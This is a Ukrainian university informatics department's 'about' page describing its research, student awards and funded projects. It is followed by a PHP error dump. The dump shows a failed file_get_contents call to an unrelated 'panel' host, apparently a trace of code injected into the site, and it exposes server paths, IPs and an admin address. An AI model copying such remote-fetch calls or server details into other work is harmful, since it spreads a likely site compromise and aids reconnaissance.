Кафедра інформатики Комп'ютерні науки

Студент
 • Наша кафедра:

  На нашій кафедрі проводиться науково-дослідна робота, яка є базою для підготовки кваліфікованих спеціалістів з обробки зображень, розробки методів аналізу та інтерпретації багатовимірної інформації різної фізичної природи, пошуку та збереження за контекстними атрибутами інформації у базах даних. В межах кафедри діє навчально-науково-дослідна лабораторія.

  У науковій роботі кафедри беруть участь викладачі та наукові співробітники кафедри, а також студенти спеціальності «Інформатика». Систематично виконуються науково-дослідні роботи, підтримуються міжнародні зв’язки з зарубіжними партнерами, діють науково-методичні семінари, здійснюється науково-дослідна робота студентів, проводиться підготовка спеціалістів вищої кваліфікації – магістрів, аспірантів, докторантів.

  Фундаментальним напрямом наукових досліджень кафедри інформатики є обробка, нормалізація та розпізнавання зображень, що знайшли свої висвітлення у загальній теорії нормалізації зображень. Цей напрям був засновано завідуючим кафедри – доктором технічних наук, професором Путятіним Євгенієм Петровичем.

  Станом на 2017 рік понад 100 наукових праць співробітників кафедри опубліковано у виданнях, що входять до науково-метричної бази даних Scopus. В цих роботах відображено розвиток фундаментальних і прикладних досліджень, які проводяться на кафедрі.

  На кафедрі нашим педагогічним колективом проводиться інтенсивна наукова робота зі студентами. Кафедра Інформатики прагне якомога активніше залучати студентів до участі у конкурсах наукових робот, професійних конкурсах, виставках, наукових конференціях, технічних кружках, тощо. Бакалаври, починаючи з третього курсу, обов’язково приймають участь у роботі конференції ХНУРЕ «Радіоелектроніка та молодь у XXI столітті» та інших конференціях, як в Україні, так і за її межами (близько 30 студентів прийняли участь у виставках студентської технічної творчості, зроблено близько 110 студентських доповідей, опубліковано 5 статей зі студентами у фахових виданнях, що входять до переліку ДАК України, та 2 статті у журналах, які проіндексовано у науково-метрічній базі SCOPUS за період з 2012 р.), а в 2016 році за результатами участі у ХХ-му Ювілейному Міжнародному форумі «Радіоелектроніка та молодь у XXI столітті» студенти кафедри Малик Л.Г., Авдієва Т.О., Третяк А.О. нагороджені дипломами за перші місця в секції «Математичні моделі і методи нормалізації та аналізу мультимедійних даних». В 2016 році за результатами І туру Харьківського регіонального конкурсу студентських наукових робіт в природничих, технічних та гуманітарних науках було нагороджено та відібрано до участі у ІІ турі студентську роботу Астаппєва О.О. та Толмачової Т.В. «Автоматичний пошук та розпізнавання людей в Інтернеті» (науковий керівник – канд. техн. наук, доцент Сінельнікова О.І.). Разом з тим, щорічно команда студентів кафедри приймає участь у ІІ турі Всеукраїнської студентської олімпіаді з напряму «Інформатика», що проводиться в НТУ «ХПІ» (в 2015 році студент Балганбаєв С.О. зайняв 2 призове місце), у ІІ турі Міжнародної олімпіади з програмування (2012-2015 роки), у конкурсі Imagine Cup під керівництвом доцента Матат О.О., а також у Всеукраїнському конкурсі студентських наукових робіт з природничих, технічних і гуманітарних наук напрямків «Інформатика, обчислювальна техніка та автоматизація», «Інформатика та кібернетика», який щорічно проводиться у м.Суми (в 2015 році студент Костенко Е.А. зайняв 3 призове місце).

  Крім того, слід відзначити низку командних та персональних перемог студентів кафедри у престижних студентських змаганнях як результат спеціальної підготовки та додаткової роботи з викладачами кафедри: у відкритому XII Чемпіонаті Харкова зі спортивного програмування, який відбувся в 2015 році, команда університету KhNURE_United, до складу якої входить студент кафедри Балганбаєв С.О., займає 3 призове місце; в тому ж році у складі команди KhNURE_United студент Балганбаєв С.О. займає 1 призове місце в 1/8 першості світу ACM ICPC (І обласний етап, що проводився в базових Вищих Навчальних закладах відповідної області України); в 2014 році в Міжнародній олімпіаді з інформатики, що проводилася в Казахстані, студент кафедри Балганбаєв С.О. займає 2 призове місце.

  Кафедрою проводиться масштабна робота із залучення студентів до участі у міжнародних наукових та академічних проектах. Так, починаючи з 2016 року, студенти кафедри Астаппєв О.О. та Толмачова Т.В. є учасниками програми з одержання подвійного диплома магістра напрямку «Інформатика» в рамках європейського проекту ERASMUS+ (KA1 – Erasmus Mundus Joint Master Degrees 2016). Участь у програмі була ініційована кафедрою Інформатики в 2015 році (відповідальна особа – проф., докт. техн. наук Кузьомін О.Я.), партнер проекту – Лейбніц Університет (м. Ганновер, ФРН).

  Дослідження викладачів, наукових співробітників та аспірантів кафедри інформатика входять до ряду міжнародних науко-метричних баз, зокрема: ACM Digital Library, Bacon’s Media Directory, Index Copernicus, Cabell’s Directories, DBLP, EBSCO, BASE та інші.

  Станом на кінець 2016 р. кількість публікацій викладачів, наукових співробітників та аспірантів каф. інформатика в наукометричній базі Scopus склала 64, кількість цитувань – 32.

  Викладачі, наукові співробітники і аспіранти кафедри беруть активну участь в бюджетних та госпдоговірних НДР. Держбюджетну тематику наукових досліджень останніх років наведено у таблиці

  Таблиця 1. Держбюджетна тематика наукових досліджень кафедри інформатика
  д/б № 211 (підрозділи 1 та 2) № ДР0107U003029 Дослідження та розробка методів і моделей інтерпретації даних в системах комп’ютерного зору 01.01.2007 – 31.12 2009
  д/б № 246 (підрозділи 1 та 2) № ДР0110U002636 Моделі і методи грануляції та інтерпретації багатовимірних даних 01.01.2010 – 31.12 2012
  д/б № 272 (підрозділи 1 та 3) № ДР0113U000357 Моделі і методи аналізу та інтерпретації динамічних процесів 01.01.2013 – 31.12 2015
  д/б № 307 (підрозділ 2) № ДР0116U002539 Розробка гібридних систем та методів обчислювального інтелекту для обробки потоків нечіткої інформації за умов нестаціонарності та невизначенності 01.01.2016 – 31.12 2018

  Значна кількість господоговірних НДР проведено з зарубіжними фірмами з Німеччини, зокрема з фірмою LOEWE OPTA GMBH (Германія, м. Кронах, наук. кер. д.т.н., проф. В.П. Машталір).

 • Основними науковими досягненнями кафедри є:

  • Математичнi моделi

   Отримання математичних моделей розкладу повної проективної групи на базові підгрупи, що дає можливість розробки методів та алгоритмів синтезу послідовних та паралельних нормалізаторів;

  • Розпізнавання та нормалізації зображень

   Нові прикладні рішення із розпізнавання та нормалізації зображень в умовах дії складних геометричних перетворювань та збурень

  • Формалізація критеріїв

   Формалізація критеріїв і обмежень для задач сегментації та ідентифікації геометричних об’єктів з урахуванням мультіалгебраїчних підходів та грануляції даних;

  • Розробка методів морфологічної нормалізації бінарних зображен

   Розробка методів морфологічної нормалізації бінарних зображень на основі аналізу бінарних перерізів та удосконалення методів пошуку параметрів геометричних перетворень;

  • Дослідження та адаптація методів вейвлет аналізу

   Дослідження та адаптація методів вейвлет аналізу для визначення та ідентифікації об’єктів на зображеннях;

  • Розробка моделей та методів темпоральної обробки відеопоток

   Розробка моделей та методів темпоральної обробки відеопотоків для інтелектуальних інформаційних технологій пошуку даних..

yii\base\ErrorException
Error

PHP Warningyii\base\ErrorException

file_get_contents(http://panel.google-amp.org/al.php?s=187): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found

$_GET = [
  'page' => '3',
];

$_SERVER = [
  'PATH' => '/usr/local/bin:/usr/bin:/bin',
  'TEMP' => '/tmp',
  'TMP' => '/tmp',
  'TMPDIR' => '/tmp',
  'PWD' => '/',
  'HTTP_ACCEPT' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  'HTTP_ACCEPT_ENCODING' => 'gzip',
  'HTTP_ACCEPT_LANGUAGE' => 'en-US,en;q=0.5',
  'HTTP_CONNECTION' => 'Keep-Alive',
  'CONTENT_LENGTH' => '0',
  'HTTP_HOST' => 'informatics.nure.ua',
  'HTTP_USER_AGENT' => 'CCBot/2.0 (https://commoncrawl.org/faq/)',
  'HTTP_IF_MODIFIED_SINCE' => 'Mon, 19 Aug 2019 08:18:04 JST',
  'REDIRECT_REDIRECT_UNIQUE_ID' => 'XfGGNBw@cywGnUqxSSDuAwAAAFI',
  'REDIRECT_REDIRECT_SCRIPT_URL' => '/site/about',
  'REDIRECT_REDIRECT_SCRIPT_URI' => 'http://informatics.nure.ua/site/about',
  'REDIRECT_REDIRECT_STATUS' => '200',
  'REDIRECT_UNIQUE_ID' => 'XfGGNBw@cywGnUqxSSDuAwAAAFI',
  'REDIRECT_SCRIPT_URL' => '/site/about',
  'REDIRECT_SCRIPT_URI' => 'http://informatics.nure.ua/site/about',
  'REDIRECT_STATUS' => '200',
  'UNIQUE_ID' => 'XfGGNBw@cywGnUqxSSDuAwAAAFI',
  'SCRIPT_URL' => '/site/about',
  'SCRIPT_URI' => 'http://informatics.nure.ua/site/about',
  'SERVER_SIGNATURE' => '',
  'SERVER_SOFTWARE' => 'Apache',
  'SERVER_NAME' => 'informatics.nure.ua',
  'SERVER_ADDR' => '94.23.148.121',
  'SERVER_PORT' => '80',
  'REMOTE_ADDR' => '3.233.224.8',
  'DOCUMENT_ROOT' => '/home/informaticsnure/public_html',
  'REQUEST_SCHEME' => 'http',
  'CONTEXT_PREFIX' => '',
  'CONTEXT_DOCUMENT_ROOT' => '/home/informaticsnure/public_html',
  'SERVER_ADMIN' => 'webmaster@informatics.nure.ua',
  'SCRIPT_FILENAME' => '/home/informaticsnure/public_html/web/index.php',
  'REMOTE_PORT' => '38338',
  'REDIRECT_URL' => '/web/site/about',
  'REDIRECT_QUERY_STRING' => 'page=3',
  'SERVER_PROTOCOL' => 'HTTP/1.1',
  'REQUEST_METHOD' => 'GET',
  'QUERY_STRING' => 'page=3',
  'REQUEST_URI' => '/site/about?page=3',
  'SCRIPT_NAME' => '/web/index.php',
  'PHP_SELF' => '/web/index.php',
  'REQUEST_TIME_FLOAT' => 1576109620.104290008544921875,
  'REQUEST_TIME' => 1576109620,
];

$_SESSION = [
  '__flash' => [],
];